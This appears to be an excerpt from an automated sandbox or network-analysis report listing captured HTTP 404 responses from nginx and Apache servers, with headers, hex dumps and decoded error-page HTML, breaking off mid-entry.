            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 26 Sep 2024 13:25:15 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 26 Sep 2024 13:25:17 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 26 Sep 2024 13:24:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 26 Sep 2024 13:24:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 26 Sep 2024 13:24:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cd104a-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 26 Sep 2024 13:25:02 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cd104a-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 13:25:56 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 13:25:59 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 13:26:01 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 13:26:05 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 